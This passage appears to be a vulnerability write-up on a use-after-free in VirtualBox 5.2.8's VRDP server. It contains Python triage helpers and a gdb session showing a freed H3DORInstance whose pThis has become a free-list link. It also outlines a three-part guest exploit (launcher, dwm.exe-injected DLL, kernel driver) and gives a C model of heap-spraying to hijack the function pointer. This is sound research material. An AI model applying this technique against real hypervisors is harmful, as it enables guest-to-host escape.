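def changed_qwords(before, after):
    """(index, old, new) of every qword that differs between two dumps of the same object."""
    return [(i, b, a) for i, (b, a) in enumerate(zip(before, after)) if b != a]

def triage():
    """Chains in the free-list dump, header of the object hit at line 1994, and which of its
    qwords changed in between (qword 0, loaded as pThis there, is still the fd link)."""
    objs = parse_dump(PLI_OUTPUT)
    hdr = chunk_header(parse_dump(AFTER_DUMP)[0])
    before = next(o for o in objs if o.addr == hdr["user_ptr"])
    return free_list_chains(objs), hdr, changed_qwords(before.qwords, hdr["qwords"])
```

Calling triage() returns the two chains (the longer one runs 0x7fb79d0a7430 to 0x7fb79d130260 and leaves the dump at 0x7fb79cc81470, the shorter ends in NULL after 0x7fb79cc67450), the decoded header (size 0x30, NON_MAIN_ARENA set) and the three qwords at indices 1 to 3 that changed between the two dumps.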
Next, we continue to break on our crucial code, which is reached in the current iteration (remember that we are using unoptimized binaries compiled by us at the moment).<\/p>\n<\/p>\n<div id=\"crayon-5b7b3e582f522258853861\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<\/p>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px
!important; line-height: 15px !important;\"> gef\u27a4  b \/home\/user\/src\/VirtualBox\/src\/VBox\/Main\/src-client\/ConsoleVRDPServer.cpp:1994  Breakpoint 5 at 0x7fb7af4eb017: file \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/Main\/src-client\/ConsoleVRDPServer.cpp, line 1994.  gef\u27a4  c  Continuing.    Thread 43 &#8220;VDMA&#8221; hit Breakpoint 5, ConsoleVRDPServer::H3DORVisibleRegion (H3DORInstance=0x7fb79cf983c0, cRects=0x1, paRects=0x7fb79cc7cab0) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/Main\/src-client\/ConsoleVRDPServer.cpp:1994  1994\t        p-&gt;pThis-&gt;m_interfaceImage.VRDEImageRegionSet (p-&gt;hImageBitmap,  gef\u27a4  x\/16i $pc  =&gt; 0x7fb7af4eb017:\tmov    rax,QWORD PTR [rbp-0x8]     0x7fb7af4eb01b:\tmov    rax,QWORD PTR [rax]     0x7fb7af4eb01e:\tmov    rax,QWORD PTR [rax+0x320]     0x7fb7af4eb025:\tmov    rdx,QWORD PTR [rbp-0x8]     0x7fb7af4eb029:\tmov    rcx,QWORD PTR [rdx+0x8]     0x7fb7af4eb02d:\tmov    rdx,QWORD PTR [rbp-0x38]     0x7fb7af4eb031:\tmov    esi,DWORD PTR [rbp-0x2c]     0x7fb7af4eb034:\tmov    rdi,rcx     0x7fb7af4eb037:\tcall   rax     0x7fb7af4eb039:\tnop     0x7fb7af4eb03a:\tleave       0x7fb7af4eb03b:\tret      gef\u27a4  si  0x00007fb7af4eb01b\t1994\t        p-&gt;pThis-&gt;m_interfaceImage.VRDEImageRegionSet (p-&gt;hImageBitmap,  gef\u27a4  x\/8gx $rax-0x10  0x7fb79cf983b0:\t0x0000000000000090\t0x0000000000000035  0x7fb79cf983c0:\t0x00007fb79d12dc40\t0x00007fb700000000  0x7fb79cf983d0:\t0x00007fb79cc7b8d0\t0x00007f0100000000  0x7fb79cf983e0:\t0x0000000000010101\t0x00000000000000e5<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-5b7b3e582f522258853861-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f522258853861-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f522258853861-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f522258853861-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f522258853861-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f522258853861-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f522258853861-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f522258853861-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f522258853861-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f522258853861-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f522258853861-22\">22<\/div>\n<div class=\"crayon-num\" 
data-line=\"crayon-5b7b3e582f522258853861-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f522258853861-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f522258853861-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f522258853861-27\">27<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-1\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">home<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VirtualBox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VBox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Main<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">client<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ConsoleVRDPServer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cpp<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">1994<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f522258853861-2\"><span class=\"crayon-i\">Breakpoint<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-i\">at<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7af4eb017<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">file<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">home<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VirtualBox<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">5.2.8<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VBox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Main<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">client<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ConsoleVRDPServer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cpp<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">line<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1994.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-3\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-i\">c<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f522258853861-4\"><span class=\"crayon-v\">Continuing<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f522258853861-6\"><span class=\"crayon-i\">Thread<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">43<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;VDMA&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hit <\/span><span class=\"crayon-i\">Breakpoint<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ConsoleVRDPServer<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">H3DORVisibleRegion<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">H3DORInstance<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0x7fb79cf983c0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cRects<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0x1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">paRects<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0x7fb79cc7cab0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">at<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">home<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VirtualBox<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">5.2.8<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VBox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Main<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">client<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ConsoleVRDPServer<\/span><span 
class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cpp<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">1994<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-7\"><span class=\"crayon-cn\">1994<\/span><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">pThis<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">m_interfaceImage<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">VRDEImageRegionSet<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">hImageBitmap<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f522258853861-8\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">16i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">pc<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-9\"><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7af4eb017<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rbp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">0x8<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line 
crayon-striped-line\" id=\"crayon-5b7b3e582f522258853861-10\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7fb7af4eb01b<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-11\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7fb7af4eb01e<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x320<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f522258853861-12\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7fb7af4eb025<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rdx<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rbp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">0x8<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-13\"><span 
class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7fb7af4eb029<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rcx<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rdx<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x8<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f522258853861-14\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7fb7af4eb02d<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rdx<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rbp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">0x38<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-15\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7fb7af4eb031<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">esi<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">DWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rbp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">0x2c<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5b7b3e582f522258853861-16\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7fb7af4eb034<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rdi<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-i\">rcx<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-17\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7fb7af4eb037<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">call&nbsp;&nbsp; <\/span><span class=\"crayon-i\">rax<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f522258853861-18\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7fb7af4eb039<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">nop<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-19\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7fb7af4eb03a<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">leave<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f522258853861-20\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7fb7af4eb03b<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">ret&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-21\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-i\">si<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f522258853861-22\"><span class=\"crayon-cn\">0x00007fb7af4eb01b<\/span><span 
class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">1994<\/span><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">pThis<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">m_interfaceImage<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">VRDEImageRegionSet<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">hImageBitmap<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-23\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">8gx<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">0x10<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f522258853861-24\"><span class=\"crayon-cn\">0x7fb79cf983b0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000090<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000035<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-25\"><span class=\"crayon-cn\">0x7fb79cf983c0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79d12dc40<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb700000000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f522258853861-26\"><span class=\"crayon-cn\">0x7fb79cf983d0<\/span><span class=\"crayon-o\">:<\/span><span 
class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cc7b8d0<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f0100000000<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-27\"><span class=\"crayon-cn\">0x7fb79cf983e0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000010101<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00000000000000e5<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0084 seconds] -->  <\/p>\n<p>As you can see, $rax holds a pointer to the second H3DORInstance from the bottom (0x7fb79cf983c0), and its first qword (0x00007fb79d12dc40) is a pointer to the malloc_chunk of another freed H3DORInstance (0x7fb79d12dc50-0x10), i.e. the free-list link that the allocator wrote over pThis when this instance was freed. The chunk header at $rax-0x10 shows a size field of 0x35: a 0x30-byte chunk with the PREV_INUSE and NON_MAIN_ARENA bits set.<\/p>\n<p>The main thing required to exploit this vulnerability is the ability to create an arbitrary number of H3DORInstances and to spray the heap around them so that [[$rax]+0x320] points to executable code we control.<\/p>\n<p><strong>Exploit<\/strong><br \/> The exploit consists of three parts:<\/p>\n<ul>\n<li>Guest usermode executable launcher (vrdpexploit_launcher.exe)<\/li>\n<li>Guest usermode library to inject into the dwm.exe process (hostid_hijacker.dll)<\/li>\n<li>Guest kernelmode driver (vrdpexploit.sys)<\/li>\n<\/ul>\n<p>The exploit requires elevated privileges to load the driver. 
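<\/p>
<p>The three states that the dump and the analysis above describe (a live instance, a freed instance whose first qword has become a free-list link, and a sprayed chunk that redirects the call) can be reproduced without VirtualBox. The C program below is an added example written for this page, not code from the advisory or from the VirtualBox sources. It keeps only what the disassembly at ConsoleVRDPServer.cpp:1994 fixes: a 0x30-byte H3DORInstance whose first qword is pThis, and a function pointer read from pThis at +0x320. The type names ServerModel and H3DORInstanceModel, the sim_* free-list allocator (which, like glibc fastbins and tcache, stores its link in the first qword of a freed chunk) and the marker values are hypothetical scaffolding for the example.<\/p>

```c
#include <stdint.h>
#include <stddef.h>

// Offsets and sizes come from the gdb session on this page: the freed
// instance sits in a 0x30-byte chunk (size field 0x35), line 1994 loads
// pThis from the first qword of the instance and calls [pThis+0x320].
// Everything else (type names, sim_* allocator, markers) is hypothetical
// scaffolding for this example, not VirtualBox code.
#define IFACE_OFFSET 0x320
#define SLOT_QWORDS  6
#define NSLOTS       8

enum { LEGIT_MARK = 1, ATTACKER_MARK = 2 };

typedef int (*RegionSetFn)(void *hBitmap, uint32_t cRects, const void *paRects);

// Stand-in for ConsoleVRDPServer: only the function pointer at +0x320 matters.
typedef struct {
    uint8_t     before[IFACE_OFFSET];
    RegionSetFn VRDEImageRegionSet;
} ServerModel;

// Stand-in for H3DORInstance: the two qwords that line 1994 reads come first.
typedef struct {
    ServerModel *pThis;
    void        *hImageBitmap;
    uint64_t     rest[SLOT_QWORDS - 2];
} H3DORInstanceModel;

static int legit_region_set(void *h, uint32_t n, const void *r)    { (void)h; (void)n; (void)r; return LEGIT_MARK; }
static int attacker_region_set(void *h, uint32_t n, const void *r) { (void)h; (void)n; (void)r; return ATTACKER_MARK; }

// Fixed-size LIFO free list. Like glibc fastbins/tcache it keeps the link to
// the next free chunk in the first qword of the freed chunk, i.e. on top of
// pThis. That overwrite is what the x/8gx output above shows.
typedef union {
    H3DORInstanceModel inst;
    void              *next;
    uint64_t           raw[SLOT_QWORDS];
} Slot;

static Slot  g_heap[NSLOTS];
static Slot *g_free_head;

static void sim_init(void) {
    g_free_head = NULL;
    for (int i = NSLOTS - 1; i >= 0; i--) { g_heap[i].next = g_free_head; g_free_head = &g_heap[i]; }
}
static Slot *sim_alloc(void) { Slot *s = g_free_head; if (s) g_free_head = s->next; return s; }
static void  sim_free(Slot *s) { s->next = g_free_head; g_free_head = s; }

// The dispatch at ConsoleVRDPServer.cpp:1994, applied to whatever p points at.
static int h3dor_visible_region(H3DORInstanceModel *p) {
    return p->pThis->VRDEImageRegionSet(p->hImageBitmap, 1, NULL);
}

static ServerModel g_server;       // the object live instances point to
static ServerModel g_fake_server;  // attacker-controlled bytes the spray points pThis at

// State 1: live instance, the call goes where the server intended.
int dispatch_before_free(void) {
    sim_init();
    g_server.VRDEImageRegionSet = legit_region_set;
    Slot *a = sim_alloc();
    a->inst.pThis = &g_server;
    a->inst.hImageBitmap = NULL;
    return h3dor_visible_region(&a->inst);
}

// State 2: both instances freed. The stale pointer still names b, but b's
// first qword is now the free-list link to a. Dereferencing [a+0x320] from
// here is the VM process termination described in the advisory, so the
// example only inspects the qword.
int stale_pthis_is_freelist_neighbor(void) {
    sim_init();
    Slot *a = sim_alloc(), *b = sim_alloc();
    a->inst.pThis = b->inst.pThis = &g_server;
    sim_free(a);
    sim_free(b);
    return (void *)b->inst.pThis == (void *)a;
}

// State 3: spray. A same-size allocation reuses b's chunk (LIFO), its first
// qword is filled with a pointer to controlled memory whose +0x320 holds our
// function, and the stale dispatch lands there.
int dispatch_after_spray(void) {
    sim_init();
    g_server.VRDEImageRegionSet = legit_region_set;
    g_fake_server.VRDEImageRegionSet = attacker_region_set;
    Slot *a = sim_alloc(), *b = sim_alloc();
    a->inst.pThis = b->inst.pThis = &g_server;
    H3DORInstanceModel *stale = &b->inst;   // what the VDMA thread still holds
    sim_free(a);
    sim_free(b);
    Slot *spray = sim_alloc();              // gets b's chunk back
    spray->inst.pThis = &g_fake_server;
    spray->inst.hImageBitmap = NULL;
    return h3dor_visible_region(stale);
}

int main(void) {
    return (dispatch_before_free() == LEGIT_MARK
            && stale_pthis_is_freelist_neighbor()
            && dispatch_after_spray() == ATTACKER_MARK) ? 0 : 1;
}
```

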